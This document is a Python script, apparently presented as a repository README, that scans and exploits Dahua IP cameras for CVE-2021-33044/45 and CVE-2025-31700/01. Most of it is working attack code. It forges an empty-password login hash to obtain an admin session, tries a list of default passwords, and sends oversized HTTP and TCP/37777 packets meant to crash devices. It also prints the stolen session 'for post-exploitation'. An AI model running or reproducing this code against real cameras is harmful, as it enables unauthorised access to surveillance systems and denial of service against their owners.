README.md
Rendering markdown...
#!/usr/bin/env python3
"""
Dahua IP Camera - Multi-CVE Scanner & PoC
CVE-2021-33044, CVE-2021-33045, CVE-2025-31700, CVE-2025-31701
Sources: NVD, Dahua Security Advisory DSA-2021-001 / DSA-2025-001
https://nvd.nist.gov/vuln/detail/CVE-2021-33044
https://nvd.nist.gov/vuln/detail/CVE-2025-31700
CVE-2021-33044 CVSS 9.8 CRITICAL CWE-287 (Improper Authentication)
Auth bypass during RPC2 login via malicious data packet.
Affects: IPC-HUM7xxx, IPC-HX3xxx, IPC-HX5xxx, TPC-*, VTO-*, VTH-*
Firmware < 2.820.x.210705 (IPC) / < 2.630.x.210707 (TPC)
CVE-2021-33045 CVSS 9.8 CRITICAL CWE-287
Same bypass. Widens scope to NVR-1/2/4/5/6xx & XVR-4x/5x/7x series
Firmware < 4.001.x.210709
CVE-2025-31700 CVSS 8.1 HIGH CWE-120 (Buffer Overflow)
Buffer overflow via specially crafted malicious packet.
DoS (crash) guaranteed; RCE possible on devices without ASLR.
Advisory: https://dahuasecurity.com/aboutUs/trustedCenter/details/775
CVE-2025-31701 CVSS 8.1 HIGH CWE-120 (Buffer Overflow)
Same buffer overflow, different device set.
Published: 2025-07-23 (no public PoC yet - DoS test included)
"""
import requests
import hashlib
import socket
import struct
import sys
import argparse
requests.packages.urllib3.disable_warnings()
# ---------------------------------------------------------------------------
# Shared helpers
# ---------------------------------------------------------------------------
def rpc2_challenge(target, port, timeout=8, http=None):
"""Get realm + random nonce + session from the camera's RPC2 login endpoint."""
try:
r = (http or requests).post(
f"http://{target}:{port}/RPC2_Login",
json={"method": "global.login",
"params": {"userName": "admin", "password": "",
"clientType": "Web3.0",
"loginType": "Direct",
"authorityType": "Default",
"passwordType": "Default"},
"id": 1, "session": 0},
timeout=timeout, verify=False)
data = r.json()
d = data.get("params", {})
return d.get("realm", ""), d.get("random", ""), data.get("session", 0)
except Exception:
return None, None, 0
def rpc2_login(target, port, user, pw_hash, session=0, timeout=8, http=None):
"""Submit an RPC2 login hash; returns the full JSON response dict."""
try:
r = (http or requests).post(
f"http://{target}:{port}/RPC2_Login",
json={"method": "global.login",
"params": {"userName": user, "password": pw_hash,
"clientType": "Web3.0",
"loginType": "Direct",
"authorityType": "Default",
"passwordType": "Default"},
"id": 2, "session": session},
timeout=timeout, verify=False)
return r.json()
except Exception as e:
return {"error": str(e)}
def bypass_hash(user, realm, random_str):
"""Crafted empty-password hash used in CVE-2021-33044/45 bypass."""
s1 = hashlib.md5(f"{user}:{realm}:".encode()).hexdigest().upper()
s2 = hashlib.md5(f"{s1}:{random_str}:{s1}".encode()).hexdigest().upper()
return s2
def legit_hash(user, pw, realm, random_str):
"""Correct hash for default-credential check."""
s1 = hashlib.md5(f"{user}:{realm}:{pw}".encode()).hexdigest().upper()
s2 = hashlib.md5(f"{s1}:{random_str}:{s1}".encode()).hexdigest().upper()
return s2
# ---------------------------------------------------------------------------
# CVE-2021-33044 / CVE-2021-33045 -- Authentication Bypass (CVSS 9.8)
# ---------------------------------------------------------------------------
def test_auth_bypass(target, port=80, timeout=8):
"""
Attempt the empty-password RPC2 bypass.
Vulnerable firmware accepts MD5(user:realm:) without any real password.
Returns (vulnerable: bool, session_id: str)
"""
http = requests.Session()
http.verify = False
print("[*] CVE-2021-33044/45 -- RPC2 auth bypass")
realm, rnd, sess = rpc2_challenge(target, port, timeout, http=http)
if not realm:
print(" [-] RPC2_Login not reachable")
return False, None
print(f" [+] Realm: '{realm}' Random: '{rnd}' Session: {sess}")
bh = bypass_hash("admin", realm, rnd)
resp = rpc2_login(target, port, "admin", bh, sess, timeout, http=http)
if resp.get("result") is True:
sid = resp.get("session", "")
print(f" [!!!] VULNERABLE -- session: {sid}")
return True, sid
err = resp.get("error", {})
print(f" [-] Not vulnerable (patched) -- {err.get('code')}: {err.get('message')}")
return False, None
def test_default_creds(target, port=80, timeout=8):
"""Check common default passwords (useful regardless of CVE patch status)."""
http = requests.Session()
http.verify = False
print("[*] Default credential check")
realm, rnd, sess = rpc2_challenge(target, port, timeout, http=http)
if not realm:
print(" [-] RPC2_Login not reachable")
return None
for user, pw in [("admin", ""), ("admin", "admin"), ("admin", "888888"),
("admin", "666666"), ("admin", "123456"),
("666666", "666666"), ("888888", "888888")]:
resp = rpc2_login(target, port, user, legit_hash(user, pw, realm, rnd), sess, timeout, http=http)
if resp.get("result") is True:
print(f" [+] Valid: {user}:{pw!r}")
return user, pw, resp.get("session")
print(" [-] No default credentials matched")
return None
# ---------------------------------------------------------------------------
# CVE-2025-31700 / CVE-2025-31701 -- Buffer Overflow DoS (CVSS 8.1)
# ---------------------------------------------------------------------------
def _send_overflow_http(target, port, timeout=8):
"""
Send an oversized payload to the RPC2 HTTP parser.
A vulnerable device may crash (DoS) or behave unexpectedly.
"""
oversized_value = "A" * 8192 # well beyond any sane field limit
payload = {
"method": "global.login",
"params": {
"userName": oversized_value,
"password": oversized_value,
"clientType": oversized_value,
"authorityType": "Default",
"passwordType": "Default"
},
"id": 1
}
try:
r = requests.post(
f"http://{target}:{port}/RPC2_Login",
json=payload, timeout=timeout, verify=False)
return r.status_code, len(r.content)
except requests.exceptions.ConnectionError:
return "CONNECTION_RESET", 0
except requests.exceptions.Timeout:
return "TIMEOUT", 0
except Exception as e:
return str(e), 0
def _send_overflow_tcp(target, tcp_port=37777, timeout=8):
"""
Send an oversized raw TCP packet to the Dahua binary protocol port (37777).
Devices without ASLR may crash.
"""
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(timeout)
s.connect((target, tcp_port))
# Minimal Dahua binary frame header (magic 0xFF010000) + oversized body
body = b"A" * 65535
header = struct.pack(">I", 0xFF010000) + struct.pack(">I", len(body))
s.sendall(header + body)
try:
resp = s.recv(1024)
s.close()
return "RESPONDED", len(resp)
except socket.timeout:
s.close()
return "TIMEOUT_AFTER_SEND", 0
except ConnectionRefusedError:
return "PORT_CLOSED", 0
except Exception as e:
return str(e), 0
def test_buffer_overflow(target, port=80, timeout=8):
"""
CVE-2025-31700 / CVE-2025-31701 -- overflow probe.
Sends over-length data to HTTP RPC2 and optional TCP/37777.
A crash or connection reset may indicate the device is vulnerable.
WARNING: This test may cause the device to crash (DoS).
"""
print("[*] CVE-2025-31700/01 -- Buffer overflow DoS probe")
print(" [!] WARNING: may crash the target device")
# HTTP overflow
status, length = _send_overflow_http(target, port, timeout)
print(f" HTTP response : status={status} len={length}")
http_vuln = status in ("CONNECTION_RESET", "TIMEOUT") or (
isinstance(status, int) and status >= 500)
# TCP overflow on port 37777 (Dahua binary protocol)
tcp_status, tcp_len = _send_overflow_tcp(target, 37777, timeout)
print(f" TCP/37777 : {tcp_status} len={tcp_len}")
tcp_vuln = tcp_status in ("TIMEOUT_AFTER_SEND",) or (
isinstance(tcp_status, str) and "reset" in tcp_status.lower())
if http_vuln or tcp_vuln:
print(" [!!!] Possible DoS -- device may have crashed (CVE-2025-31700/01)")
return True
else:
print(" [-] No obvious crash response (may still be vulnerable -- check manually)")
return False
# ---------------------------------------------------------------------------
# Main runner
# ---------------------------------------------------------------------------
CVE_MAP = {
"2021-33044": lambda t, p, to: test_auth_bypass(t, p, to),
"2021-33045": lambda t, p, to: test_auth_bypass(t, p, to),
"2025-31700": lambda t, p, to: (test_buffer_overflow(t, p, to), None),
"2025-31701": lambda t, p, to: (test_buffer_overflow(t, p, to), None),
}
def run_all(target, port, timeout):
print(f"""
==================================================
Dahua Multi-CVE Scanner
CVE-2021-33044/45 | CVE-2025-31700/01
==================================================
Target : {target}:{port}
""")
bypass_ok, session = test_auth_bypass(target, port, timeout)
print()
default_ok = test_default_creds(target, port, timeout)
print()
bof_ok = test_buffer_overflow(target, port, timeout)
print("\n" + "=" * 50)
print("SUMMARY")
print("=" * 50)
print(f" CVE-2021-33044/45 auth bypass : {'VULNERABLE' if bypass_ok else 'Not Vulnerable (patched or unreachable)'}")
print(f" Default credentials : {'FOUND' if default_ok else 'None matched'}")
print(f" CVE-2025-31700/01 buffer ovfl : {'POSSIBLE' if bof_ok else 'No crash observed'}")
if bypass_ok and session:
print(f"\n [!!!] Session ID for post-exploitation: {session}")
print(" Use dahua_auth_bypass.py --dump to enumerate device info.")
def main():
parser = argparse.ArgumentParser(
description="Dahua Multi-CVE Scanner",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
CVEs covered:
2021-33044 / 2021-33045 -- RPC2 auth bypass (CVSS 9.8)
2025-31700 / 2025-31701 -- Buffer overflow DoS (CVSS 8.1)
Examples:
python dahua_exploit.py 192.168.1.100
python dahua_exploit.py 192.168.1.100 -p 8080
python dahua_exploit.py 192.168.1.100 -c 2021-33044
"""
)
parser.add_argument("target", help="Camera IP or hostname")
parser.add_argument("-p", "--port", type=int, default=80,
help="HTTP port (default: 80)")
parser.add_argument("-c", "--cve",
choices=list(CVE_MAP.keys()),
help="Test a single CVE only")
parser.add_argument("--timeout", type=int, default=8)
args = parser.parse_args()
if args.cve:
CVE_MAP[args.cve](args.target, args.port, args.timeout)
else:
run_all(args.target, args.port, args.timeout)
if __name__ == "__main__":
main()